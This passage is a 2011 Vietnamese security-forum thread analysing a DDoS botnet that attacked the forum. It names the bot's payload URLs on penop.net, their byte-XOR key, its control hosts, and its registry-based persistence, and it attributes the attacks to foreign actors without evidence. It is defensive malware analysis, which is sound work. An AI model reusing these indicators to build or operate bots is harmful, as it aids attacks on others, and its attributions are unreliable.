Nói ra anh em STL buồn, tự dưng tới giờ em thấy việc RCE "mèo què" của mấy anh là thú vui, là giải trí cho em trong lúc kinh tế khó khăn, ít việc lúc này. Và cũng để em luyện nâng cao tay nghề RCE. Có lúc em thấy khả năng RCE em còn kém quá, "nữa mùa" quá, RCE không kịp, không được 100% các mẩu "mèo què" của mấy anh được liên tục sản xuất ra !!! smilie
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 23/07/2011 13:56:50 (+0700) | #39 | 243968
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]

TrojanDownloader:Win32/VB.SK

Encyclopedia entry
Published: Jul 22, 2011

Aliases
Not available

Alert Level (?)
Severe

Antimalware protection details
Microsoft recommends that you download the latest definitions to get protected.
Detection initially created:
Definition: 1.109.171.0
Released: Jul 22, 2011



Bạn KHUNG LONG nhầm một chút thôi mà bạn latlabao. Em đây nhiều lúc còn quên tên tháng trong tiếng Anh mà, giờ mà ai bắt em đọc từ tháng 1-12 bằng tiếng Anh là em thua (nhưng em biế July = 7 mà). Mang trả hết cho thầy cô rồi (tội nghiệp mấy thầy cô có thằng học trò như em) !

Tình cờ em đọc được bài này, mời bà con đọc thử và suy nghĩ: http://vn.360plus.yahoo.com/bom-rtm/article?mid=1556&fid=-1
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 23/07/2011 16:40:11 (+0700) | #40 | 243981
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
Mới kiểm tra lại stats của hệ thống thì thấy từ 5 giờ chiều hôm qua đến 5 giờ chiều hôm nay (giờ VN) có 81 triệu cú SYN có dung lượng 4.5Gb đập vào hệ thống và bị /dev/null. Ngoài ra, có khoảng 53 triệu full requests ở dạng DDoS đến HVA có dung lượng 55Gb (mỗi full request có kích thước khoảng 1124 bytes bao gồm SYN, ACK và ACK PSH + HTTP data load).

Hệ thống giảm DDoS từ khoảng 9 giờ tối giờ VN và giảm dần cho đến ngày hôm nay.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 23/07/2011 16:46:57 (+0700) | #41 | 243983
[Avatar]
piloveyou
Member
[Minus] 0 [Plus]
Joined: 13/04/2010 21:23:15
Bài gởi: 231
Đến từ: EveryWhere
Offline
[Profile] [PM]
Sao lại chỉ có có bác TQN & conmale một mình một chuột chống đỡ vậy chứ?
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 23/07/2011 17:33:26 (+0700) | #42 | 243988
[Avatar]
tanviet12
Member
[Minus] 0 [Plus]
Joined: 10/05/2010 12:15:15
Bài gởi: 138
Đến từ: TP - HCM
Offline
[Profile] [PM] [Email]
Không biết mấy anh chị bên VNCERT vào cuộc chưa. Chưa thấy động tĩnh gì hết
BTV
fb.com/buitanviet
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 23/07/2011 19:48:53 (+0700) | #43 | 244001
[Avatar]
mechk
Member
[Minus] 0 [Plus]
Joined: 26/01/2007 18:07:00
Bài gởi: 49
Đến từ: đâu
Offline
[Profile] [PM] [Yahoo!]
TQN wrote:

Tình cờ em đọc được bài này, mời bà con đọc thử và suy nghĩ: http://vn.360plus.yahoo.com/bom-rtm/article?mid=1556&fid=-1


Sau khi đọc xong thì em thấy kết nhất là cái ảnh ở đầu bài viết smilie
sắp !
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 23/07/2011 20:10:08 (+0700) | #44 | 244004
acoustics89
Member
[Minus] 0 [Plus]
Joined: 08/07/2011 10:17:19
Bài gởi: 50
Offline
[Profile] [PM]
piloveyou wrote:
Sao lại chỉ có có bác TQN & conmale một mình một chuột chống đỡ vậy chứ?


2 bác ấy không đơn độc đâu, còn có Scrutiny System của em nữa smilie)
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 24/07/2011 05:52:17 (+0700) | #45 | 244016
LlyKil
Member
[Minus] 0 [Plus]
Joined: 22/01/2008 18:33:58
Bài gởi: 16
Offline
[Profile] [PM]
Chào mọi người,

Tính chất cũng như kĩ thuật tấn công đã được nêu rõ, hy vọng biện pháp phòng thủ sẽ là chủ đề kế tiếp thay vì cứ bàn những vấn đề rời rạc khác. Đó mới là mục đích chính và cũng là phần thú vị (nếu RCE thì có thể "up" cái topic của bạn TQN lên tránh lạc đề smilie).
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 24/07/2011 10:33:58 (+0700) | #46 | 244023
nobitapm
Member
[Minus] 0 [Plus]
Joined: 21/07/2008 13:54:41
Bài gởi: 5
Offline
[Profile] [PM]
E đã submit cái file AcrobatUpdater.exe, size=282624 bytes mà anh TQN post lên cho Symantec hôm 22/07/2011 đến hôm nay 24/07/2011 thì nhận được câu trả lời là file đó không nguy hiểm, và cái thằng Norton Internet Security 2011 của em hôm nay quét cũng không diệt được cái file AcrobatUpdater.exe smilie. Nguyên văn trả lời của Symantec như sau :
This message is an automatically generated reply -- do not reply to this
message.

This system is designed to analyze and process suspicious file submissions
into Symantec Security Response and cannot accept correspondence or
inquiries.

---------------------------------------------------------------------------
Submission Summary
---------------------------------------------------------------------------

We have processed your submission (Tracking #20779850) and your submission
is now closed. The following is a report of our findings for the files in
your submission:

File: AcrobatUpdater.exe
Machine: Machine
Determination: Please see the developer notes.

---------------------------------------------------------------------------
Customer Notes
---------------------------------------------------------------------------

This file control bonet systemn for DDOS

---------------------------------------------------------------------------
Developer Notes
---------------------------------------------------------------------------

AcrobatUpdater.exe Our automation was unable to identify any malicious
content in this submission.
The file will be stored for further human analysis


---------------------------------------------------------------------------

This message was generated by Symantec Security Response automation.

Should you have any questions about your submission, please contact our
regional technical support from the Symantec Web site, and give them the
tracking number included in this message.


Symantec Technical Support
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 24/07/2011 11:09:10 (+0700) | #47 | 244025
PXMMRF
Administrator
Joined: 26/09/2002 07:17:55
Bài gởi: 946
Offline
[Profile] [PM]
piloveyou wrote:
Sao lại chỉ có có bác TQN & conmale một mình một chuột chống đỡ vậy chứ?


1- Đâu chỉ có TQN và conmale, còn cả tôi -PXMMRF- nữa mà. Tôi cũng đã viết một số bài đấy chứ. Hì hì. Liên quan đấn STL, không chỉ có topic này mà còn những topic khác năm rải rác ở các box khác trong forum: "RCE", "Những thảo luận khác"....
Ngoài ra đứng sau các HVA Admin. còn có khá nhiều Mod. và member khác. Secmac vừa qua chẳng viết một bài khá hay là gì.
Có điều là TQN đã viết ra quá nhiều thông tin rất có giá trị. Chúng tôi cũng phải có thời gian để nghiền ngẫm nôi dung, mới viết bổ sung được. Vả lai cũng quá bận công viêc mưu sinh, nuôi con ăn học... nên nhiều khi phải tranh thủ thời gian. Có đêm phải thức đến 1-2 h nghiền ngẫm, khai triển những phát hiện của TQN. Tôi cũng vừa phải đi công tác Hà nôi tới hơn 1 tuần.

TQN wrote:
Tình cờ em đọc được bài này, mời bà con đọc thử và suy nghĩ: http://vn.360plus.yahoo.com/bom-rtm/article?mid=1556&fid=-1


2- Xác đinh nhân thân của STL là một việc tốn nhiều thời gian, công sức, phải qua nhiều năm. Không thể từ một sự kiện (event) mà tìm ra được. Những dự đoán của TQN là đúng. Sự xác định của bạn "phanledaivuong" liên quan đến STL, ở một post phía trên, cũng là đúng.
Thưc ra tôi đã theo dõi các hiện tượng khá lạ (sau này chúng dường như mang tên STL) từ khi domains: pavietnam.net và pavietnam.com bị chiếm đoat quyền sử dung. Gọi là lạ, vì tôi thấy đây là một hành đông lấy cắp domain tinh vi, chuyên nghiệp, có liên quan đến một tổ chức mafia IT có trình độ cao của Nga (Russian). Có dịp tôi sẽ nói thêm về tổ chức tội phạm này. Hiện tại có những bằng chứng rõ ràng là STL vẫn còn liên quan đến tổ chức tôi phạm nói trên. Đây là một tổ chức hoạt đông rất rộng trên mạng, nhưng nó lai không có một website-server chính thức nào để có cơ sở truy tìm dấu vết.

Nếu các bạn đọc kỹ các bài viết của tôi về STL (bên ngoài và trong box BQT HVA), sẽ thấy từ khá lâu tôi đã xác định chúng là ai, do ai chỉ đạo, trả tiền....Và điều này ngày càng rõ. Rõ ràng là mọi việc đều cần thời gian dài để mọi người thấy rõ.
Các bạn có thể tham khảo các comment của tôi (PXMMRF-HVA và PHAM XUAN MAI) về vấn đề liên quan tại bài viết trên McAfee blog: "Vietnamese Speakers Targeted In Cyberattack"
http://blogs.mcafee.com/corporate/cto/vietnamese-speakers-targeted-in-cyberattack
Khi đó tôi đã xác định tác giả của W32/VulcanBot là Chinese hacker, mà cụ thể là là STL

3- Tôi đồng ý với một số nhận định trong bài viết của bạn "CHIẾN SĨ AN NINH" tại:
http://vn.360plus.yahoo.com/bom-rtm/article?mid=1556&fid=-1
Quả thưc lưc lượng AN NINH thì làm việc vất vả, luôn phải đối phó với hiểm nguy, khá trong sạch, vì ít có cơ hôi tham nhũng. Nhưng tất nhiên cũng không phải không có một vài cá nhân, trường hợp không hay. Các trường hơp này tuy ít về số lượng, nhưng nếu có thì quy mô và tác hại lại rất lớn. Cũng có trường hợp có người giải quyết vấn đề một cách manh đông, thiếu suy nghĩ chín chắn. Tuy nhiên điều nay cơ bản là tôi đồng ý với ý kiến của bạn "CHIẾN SĨ AN NINH".

Nhưng điều tôi không đồng ý là: thưc ra theo tôi "Không có bất cứ một thoả thuận nào giữa TQ và VN về hỗ trợ lẫn nhau trong an ninh và bảo vệ mạng truyền thông quốc gia". Có nhiều lý do, trong đó có lý do này. Trước các năm 80, Internet chưa có tại TQ và Việt nam. Chẳng ai lai đi bàn và ký kết các hiệp đinh liên quan đến mạng truyền thông. Sau các năm 80 thì hậu quả của các trận chiến TQ xâm lược VN năm 1979, trận chiến Trường sa 1988... rất nặng nề. Hai bên có nhiều bất đồng, chỉ "bằng mặt mà không bằng lòng", luôn luôn dò xét và canh chừng lẫn nhau. Một hiệp định quan trọng về thông tin, bảo mật như vậy rất khó được đề cập.
Tôi có hỏi một vài người bạn cùng học phổ thông, nay đang đảm nhân một vài chức vụ nào đó ở lưc lương ưu tú nhất của lưc lượng AN NINH, về sự hiện diện nếu có về một hiệp định như vậy. Câu trả lời của họ là "Không-Dứt khoát là Không"

4- Về mặt Trojan, Bot thì trong một quá trình lịch sử dài STL sử dụng nhiều loai Trojan khác nhau để lấy cắp thông tin và tấn công DDoS trên mạng: từ W32/VulcaBot (vào khoảng các tháng đầu năm 2010), đến VeceBot (vào khoảng các tháng cuối năm 2010) và loại Trojan hiện nay mà anh TQN đang phân tích một cách rõ ràng và khá hay, tạm gọi là "STLBot".

Các Trojan này đều có những điểm khá giống nhau và đươc cải tiến dần từ một số nguồn. Nguồn đầu tiên có lẽ là đươc viết ra từ các hacker Nga, trong tổ chức Mafia IT Nga tôi nói ở trên.
Điểm giống nhau là chúng đều được "nhúng" (embedded) vào các phần mềm hay tool thông dung mà rất nhiều, hay hầu hết người Việt nam thường dùng hay phải dùng: thí dụ VPSKeys hay Vietkey2000-2002 (trường hơp W32/VulcaBot), Vietkey2007, Unikey4.x...(trường hơp Vecebot hay các STL bot sau này).
Các phần mềm, tool này được đưa lên một số website VN để tiện download, trong đó có cả website đặt TQ, hoặc STL thâm nhập vào website VN (từ việc lấy cắp mật mã truy cập website) và nhúng trojan vào. Vì vậy số máy VN và nước ngoài (của bà con Việt kiều) bị nhiễm "STLBot" rất lớn
Các trojan trong các máy bị nhiễm mã đôc thường xuyên, tự động liên hệ với một số website để update thông tin, cấu trúc và địa chỉ tấn công DDoS...
STL sử dụng rất nhiều website loai này (tạm gọi là Master websites) và đặt ở rất nhiều nơi trên TG: Mỹ, Anh, Pháp, TQ, Việt nam..... Master website có khi chỉ là một website hosting ở webserver của một công ty dịch vụ web nào đó, có thể đặt trên một webserver riêng do chính STL quản lý (bỏ tiền ra mua, thuê), có thể là các webserver lưu động sử dụng hệ thống tên miền năng động (dynamic domain system) chạy wifi miễn phí....

STL đã tốn rất nhiều thời gian, công sức, tiền bạc (sự tốn kém đến mức kinh ngạc nếu ta thử tính toán, cộng lại các khoản chi phí) để làm việc phát tán virus, lấy cắp password email, quản lý website, blog, tấn công DDoS trên mạng, deface nhiều website...

Ai tổ chức và chi tiền cho việc này. Điều này nay đã khá rõ

5- Để chống lại các cuộc tấn công DDoS trên mạng một cách hữu hiệu, điều quan trong nhất và biện pháp duy nhất trong tình hình hiện nay, theo tôi, là phải tìm mọi cách phát hiện ra các Master website chỉ huy, điều khiển mạng bot và nhanh chóng vô hiệu chúng với mọi phương tiện có thể, cần thiết.
Điều trớ trêu là việc tìm ra các Master websites thưc ra lại không khó khăn gì. Chỉ cần người sử dụng máy tính (bị nhiễm bot và trở thành một zombie) biết được đia chỉ kết nối mà bot liên hệ đến, thông qua một chương trình kiểm soát thường xuyên các kết nối từ máy mình với mạng Internet, là xong.
Trong khi trên mang có tới hàng trăm ngàn máy tính, hay nhiều hơn, đang bị nhiễm bot và trở thành các zombies



The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 24/07/2011 12:11:26 (+0700) | #48 | 244026
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Đây là 1 phần đoạn mail của bạn trẻ cao thủ gởi cho tui. Post lên đây để anh em đọc cho vui:

Về vấn đề mẫu, thì phải xuất phát từ GoogleCrashHandle ạ. Em có mẫu ấy từ bạn xxx trên xxx, cái này chắc anh đã biết. Sau khi nghiên cứu, em viết tracker cho nó, thì tải được 1 file cũng code bằng VB sau đó không lâu, tên là Jucheck.exe. Mẫu này em có từ cái hồi xxx cơ mà. Y hệt cái AcrobatUpdater luôn, chỉ có Icon là của bạn Java Update. Chính nó tấn công vietnamnet.

Mẫu này luôn truy cập để tải về file tại địa chỉ http://penop.net/top.jpg
đọc code thì thấy nó giải mã với thuật toán xor theo byte, key là 0x19. nhưng ngặt nỗi hồi đó không tải được, link chết.

Hệ thống botnet tracker của em thì chạy liên tục, lúc nào cũng định kì download các link, có mẫu mới là notify luôn.
tơi đúng hôm HVA bị dos thì có hàng mới của top.jpg , về giải mã ra thì được cái link http://penop.net/images01.gif , đó chính là mẫu virus viết bằng VB hiện giờ đang hoành hành, cũng xor 0x19 theo byte. khi chạy , tên nó là AcrobatUpdater. Hôm đó thấy file cấu hình của nó, em đã định bảo anh ngay nhưng lại không vào HVA được

Tất cả các mẫu botnet em có được, em đều đưa vào tracker của em hết, nhiều mẫu nó phải lâu lắm rồi, tưởng chết rồi, thế mà 1 ngày đẹp trời là nó sống lại và có hàng

Khoe với anh: cái tracker này em viết cũng lâu rồi, nhưng chỉ để cho vui thôi ạ, nếu không em cũng chả có mẫu mới smilie Đó là nguồn mẫu duy nhất của em đấy. Còn tình cờ gặp mấy cái như fake Unikey, cái đấy ăn may. đưa vào tracker mấy hôm thì thấy link die smilie



Bạn trẻ này đóng vai trò quan trọng nhất trong việc dò tìm và phân tích đám malwares của STL. Tui chỉ là người phát ngôn của Bộ dò tìm STL thôi. "Tui kịch liệt lên án STL" (Giống như cô Phương Nga thôi) smilie

2 anh PXMMRF: Tại sao bây giờ VNCERT, BKAV, CMC, báo chí... vẫn im ru bà rù vậy ha ???? Chuyện gì đang xảy ra sau lưng hậu trường ????
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 24/07/2011 12:58:59 (+0700) | #49 | 244027
PXMMRF
Administrator
Joined: 26/09/2002 07:17:55
Bài gởi: 946
Offline
[Profile] [PM]
TQN wrote:
Đây là 1 phần đoạn mail của bạn trẻ cao thủ gởi cho tui. Post lên đây để anh em đọc cho vui:

Về vấn đề mẫu, thì phải xuất phát từ GoogleCrashHandle ạ. Em có mẫu ấy từ bạn xxx trên xxx, cái này chắc anh đã biết. Sau khi nghiên cứu, em viết tracker cho nó, thì tải được 1 file cũng code bằng VB sau đó không lâu, tên là Jucheck.exe. Mẫu này em có từ cái hồi xxx cơ mà. Y hệt cái AcrobatUpdater luôn, chỉ có Icon là của bạn Java Update. Chính nó tấn công vietnamnet.

Mẫu này luôn truy cập để tải về file tại địa chỉ http://penop.net/top.jpg
đọc code thì thấy nó giải mã với thuật toán xor theo byte, key là 0x19. nhưng ngặt nỗi hồi đó không tải được, link chết.

Hệ thống botnet tracker của em thì chạy liên tục, lúc nào cũng định kì download các link, có mẫu mới là notify luôn.
tơi đúng hôm HVA bị dos thì có hàng mới của top.jpg , về giải mã ra thì được cái link http://penop.net/images01.gif , đó chính là mẫu virus viết bằng VB hiện giờ đang hoành hành, cũng xor 0x19 theo byte. khi chạy , tên nó là AcrobatUpdater. Hôm đó thấy file cấu hình của nó, em đã định bảo anh ngay nhưng lại không vào HVA được

Tất cả các mẫu botnet em có được, em đều đưa vào tracker của em hết, nhiều mẫu nó phải lâu lắm rồi, tưởng chết rồi, thế mà 1 ngày đẹp trời là nó sống lại và có hàng

Khoe với anh: cái tracker này em viết cũng lâu rồi, nhưng chỉ để cho vui thôi ạ, nếu không em cũng chả có mẫu mới smilie Đó là nguồn mẫu duy nhất của em đấy. Còn tình cờ gặp mấy cái như fake Unikey, cái đấy ăn may. đưa vào tracker mấy hôm thì thấy link die smilie



Bạn trẻ này đóng vai trò quan trọng nhất trong việc dò tìm và phân tích đám malwares của STL. Tui chỉ là người phát ngôn của Bộ dò tìm STL thôi. "Tui kịch liệt lên án STL" smilie

2 anh PXMMRF: Tại sao bây giờ VNCERT, BKAV, CMC, báo chí... vẫn im ru bà rù ????



Như tôi đã viết, STL dự phòng rất nhiều master websites và đặt ở nhiều nơi trên thế giới. Có thể dễ dàng thay thế các master mới khi những cái cũ bị phát hiện.
Như vừa rồi khi thấy TQN phát hiện ra các master website http://penop.net/ hay http://direct.aliasx.net, thì STL lập tưc inactive (vô hiệu hoá ) chúng. Khi tôi biết thông tin của TQN, tôi check thẳng vào chúng, không cần quan ngại gì, thì website này đã inactive mất rôi. Đương nhiên các file .jpg hay btm đặt tai webroot không thể tìm thấy.

Tuy nhiên scenario (kịch bản) cụ thể sẽ như sau:

- STL đọc thông tin phát hiện của TQN về các master website
(Không ít thành viên STL đang chăm chú đọc các bài viết của TQN, kể cả bài tôi đang viết nữa .Hì hì)

- STL không inactive ngay các master website, mà duy trì chúng trong một thời gian nào đó, ngắn nhưng đủ dài để các bot update các thông tin mới về muc tiêu DDoS mới cũng như đia chỉ mới của master website (đia chỉ cũ đã lộ thì STL sẽ bỏ đi)

- Do các bot tại hàng trăm ngàn zombies thường xuyên, tự động liên hệ với master website (cũ) và các kết nối ấy là persistent connection (keep-alive) nên chỉ trong một thời gian ngắn, có thể tối đa là 60 sec (với IE 6-7- hay 115 sec (với FireFox4-5) hay hơn một chút là trình duyệt của máy zombies đã giúp bot update được các thông tin mới về Master websites (tên miền, IP address). Muc tiêu tấn công DDoS có thể STL không cần thay đổi, như trường hợp HVA vừa rồi.

- Sau đó thì STL mới chính thức thay đổi Master website

Ta hình dung có một cuộc chay đua giữa HVA (TQN-conmale) và STL trong chuyện này. TQN phát hiện master website, STL thay đổi master website, TQN lai phát hiện...vv.

Nhưng tôi tin rằng lão conmale tuy già cả nhưng thường vẫn chạy nhanh hơn. Hì hì


------------
VNCERT: Biên chế ít, nên chỉ có thể quản lý mạng theo kiểu hành chính thôi

BKAV: Đang tập trung vào diệt virus nên có thể không tập trung vào RCE kỹ lưỡng và với mục đích như TQN. Vả lại theo tôi họ không giỏi RCE như TQN.

CMC: do bác Triệu trần Đức, Admin cũ của HVA, là TGD. Họ đang rất quan tâm đến các bài viết về Trojan của STL và đang viết các DAT file diệt các Trojan này. Nói chung, theo tôi họ rất tán đồng và ủng hộ HVA

Báo chí: Đến ta (HVA) mà phải tốn nhiều thời gian, công sức và phải có kiến thức sâu về RCE thì mới discover được đám Bot của STL, thì cánh báo chí sao làm được, biết được. Nhưng chắc họ cũng phải còn nghe ngóng, tìm hiểu thông tin thêm chứ, rồi mới viết bài. Cũng còn một đôi vấn đề chính chúng ta (HVA) cũng còn chưa hoàn toàn thống nhất cơ mà.
The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 24/07/2011 13:18:25 (+0700) | #50 | 244028
[Avatar]
tanviet12
Member
[Minus] 0 [Plus]
Joined: 10/05/2010 12:15:15
Bài gởi: 138
Đến từ: TP - HCM
Offline
[Profile] [PM] [Email]
Hì. HVA ta cũng có mấy huynh bên VNCERT nữa mà. Hy vọng các anh sẽ can thiệp sớm ..
BTV
fb.com/buitanviet
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 24/07/2011 14:25:17 (+0700) | #51 | 244030
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Chết là chết trong thời gian ngắn đó đấy anh PXM. Tụi nó sẽ cập nhật bot mới lập tức, setup URL download mới lập tức, hy sinh AcrobatUpdater và các URL cũ. Mình sẽ vẫn bị đánh tiếp.
File config mới xc.jpg đã không ra lệnh tắt DDOS vào HVA, mà chỉ thay = dòng trêu chọc đó. Một lượng Bot lớn còn lại vẫn theo config cũ mà dập vào HVA ta.

Đúng là nhức đầu. Giờ ta có dập được cái host direct.aliasx.net thì vẫn bị DDOS, chỉ còn nước tận diệt các bot còn tồn tại và nhanh chóng tìm ra bot mới.

Nếu ISP can thiệp, tui nghĩ họ nên firewall 2 host penop.net và direct.aliasx.net.

Bà con nào phát hiện AcrobatUpdater.exe mình và biết cách dùng Wireshark, CommView, TCPView hay SmartSniff (của Nirosoft) có thể giúp mọi người bằng cách: đừng xoá AcrobatUpdater.exe theo dõi thử AcrobatUpdater.exe connect tới host nào, URL ra sao, UserAgent như thế nào ?
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 24/07/2011 14:52:11 (+0700) | #52 | 244032
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
LlyKil wrote:
Chào mọi người,

Tính chất cũng như kĩ thuật tấn công đã được nêu rõ, hy vọng biện pháp phòng thủ sẽ là chủ đề kế tiếp thay vì cứ bàn những vấn đề rời rạc khác. Đó mới là mục đích chính và cũng là phần thú vị (nếu RCE thì có thể "up" cái topic của bạn TQN lên tránh lạc đề smilie).



Cám ơn LlyKil đã liên lạc và có một số góp ý hữu ích. Sẵn tham gia trả lời chủ đề này anh hồi âm em luôn là obscurity cũng là một biện pháp trong nhiều biện pháp bảo mật. Đi xa hơn nữa, thật và ảo xen lẫn nhau lại càng có tác dụng hơn smilie.


@ piloveyou: thật ra có rất nhiều anh em HVA nhiệt tình góp ý và đã rất năng động trong việc xử lý zombies trong giới hạn họ quản lý. TQN, conmale, PXMMRF, acoustics89.... chỉ là một số người năng động tham gia phân tích và gởi bài chính thức trên diễn đàn nhưng đằng sau đó, có rất nhiều người đã giúp đỡ và hỗ trợ một cách thầm lặng. Đây là điều đáng mừng vì hầu hết chẳng ai chấp nhận những trò phá hoại một cách bỉ ổi và hèn hạ.

Báo chí VN thì chỉ cầm chừng và cái gì có lợi thì mới làm. Ai hơi đâu mà đăng báo mãi về một diễn đàn HVA vớ vẩn nào đó bị DDoS? smilie . Chuyện quan trọng là một cơ chế cảnh báo hiểm hoạ malware và DDoS một cách rộng rãi và hữu hiệu (vẫn chưa có).
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 24/07/2011 16:09:04 (+0700) | #53 | 244034
[Avatar]
tmd
Member
[Minus] 0 [Plus]
Joined: 28/06/2006 03:39:48
Bài gởi: 2951
Offline
[Profile] [PM]
Mặc bằng chung hiểu biết của người dùng Máy tính và Công nghệ ở VN dừng ở mức khởi động máy -> sài; cài soft(bao gồm cờ rắc) -> sài; Hư->gọi IT(IT gì thì không biết) -> sài. Trong khi đó, IT thì có nhiều mức độ chưa được chuẩn hoá về hiểu biết "sàn". Thấy soft không có crack thì cắm đầu ra internet và tìm mọi cách để có crack. Cài soft anti mã độc cũng phải crack đã hẳn tính, có free cũng không sài vì muốn "crack". -> Tiếp tay cho bot net mở rộng ra.
Vì lý do chủ quan/khách quan ở trên làm cho mớ zombie ngày càng lan rộng. Coi như đã đáp ứng được điều kiện đủ của tụi đi chơi DDOS.
Điều kiện cần là những tay đốt có hệ thống các phương tiện và cách thức phát tán. Chuyện này dân thường không thể làm gì được, phải có các cơ quan chức năng như an ninh gì đó, ISP và cấp quản lý doanh nghiệp các mức độ.

Cấp nhà nước không quan tâm, thì cấp ISP phải lo, cấp ISP không lo thì cấp an ninh dịch vụ phải lo, cấp này không lo nữa thì cấp doanh nghiệp phải tự nhận thức, cấp cuối này DEK nhận thức nữa thì cấp người dùng trực tiếp "PC" nên biết là ko crack/sex.... .

Mọi chuyện đều có hệ thống lớp lang, mà VN thì lớp lang hệ thống là không có 1 cái nhìn nhận ra hồn nào hết.
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 24/07/2011 17:17:54 (+0700) | #54 | 244035
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
Có một khía cạnh đơn giản nhưng quan trọng có lẽ nên đề cập đó là quá trình biến máy con thành zombie của "AcrobatUpdater.exe".

Trong suốt quá trình nhiễm này, có hai tiểu đoạn:

1. Tạo ra:
C:\Program Files\Adobe\Updater6
[ C:\Program Files\Adobe\Updater6\AcrobatUpdater.exe

2. Điều chỉnh registry:
- Với key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Run ],
Value Name: [ Acrobat Reader and Acrobat Manager ], New Value: [ C:\Program Files\Adobe\Updater6\AcrobatUpdater.exe ]

- Với key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Run ],
Value Name: [ Acrobat Reader and Acrobat Manager ], New Value: [ C:\Program Files\Adobe\Updater6\AcrobatUpdater.exe ]

- Với key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Volatile Environment ],
Value Name: [ CURRENT ], New Value: [ 2011-07-20 16:28:52 ]

- Với key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Volatile Environment ],
Value Name: [ DATA ], New Value: [ 0x5d4c3c3d3f4b572501120204081e0371454349440e5f514c24484d550e13 ]

Nếu người dùng chỉ là "standard user" chớ chẳng phải là user với chủ quyền "administrator" thì hai động tác trên không thể xảy ra được. Trên Windows 7 càng khó hơn vì càng không thể "silently" thực thi việc này. Bởi vậy, với tổng cộng gần 100 ngàn IP tấn công HVA mấy ngày vừa qua (số lượng máy con thật sự đằng sau các IP này có lẽ còn nhiều hơn rất nhiều) toàn là những máy con chạy với chủ quyền "Administrator". Đây là sự thật đáng sợ. Cho dùng Windows 7 có bảo mật như thế nào đi chăng nữa mà người dùng sử dụng máy với account có chủ quyền cao nhất thì coi như tính bảo mật của Windows 7 cũng bỏ đi.

Vấn đề được đặt ra, tại sao người dùng dễ dàng tải exe từ những nguồn nào đó không phải từ trang chính thức của Adobe? Hãy gác qua chuyện tạo máy con làm zombies để DDoS mà hãy hình dung xem, hàng trăm ngàn máy con bị điều khiển, bị đánh cắp thông tin (có thể có cả những máy có thông tin quan trọng bởi vì trong danh sách IP tấn công HVA có cả những IP thuộc các ban ngành của chính phủ). Liệu đây là chuyện có thể xem nhẹ và làm ngơ?
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 24/07/2011 17:56:37 (+0700) | #55 | 244036
[Avatar]
tmd
Member
[Minus] 0 [Plus]
Joined: 28/06/2006 03:39:48
Bài gởi: 2951
Offline
[Profile] [PM]
Vụ "administrator" mà anh conmale nói là vấn đề chính ở VN. Đối với các cty như ngân hàng, kiểm toán, chứng khoán đã có nhận thức ở tầm mức nào đó, họ đã đưa chuyện này vào chính sách hoạt động chung. Người dùng ở mức cuối đều không biết đến user mình đang dùng ở mức nào, mọi chuyện đã có bộ phận CNTT lo.
Còn đối với các mô hình kinh doanh khác, vấn đề "administrator" tuỳ vào nhận thức của lảnh đạo về CNTT, về tính tự giác nhận thức của cấp quản lý CNTT. Về mặt bằng nhận thức, đa số doanh nghiệp không quan tâm đúng mực về ảnh hưởng của CNTT vào công việc. Họ chỉ cần "plug and play" hay "power on" là xong rồi.
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...
[Up] [Print Copy]


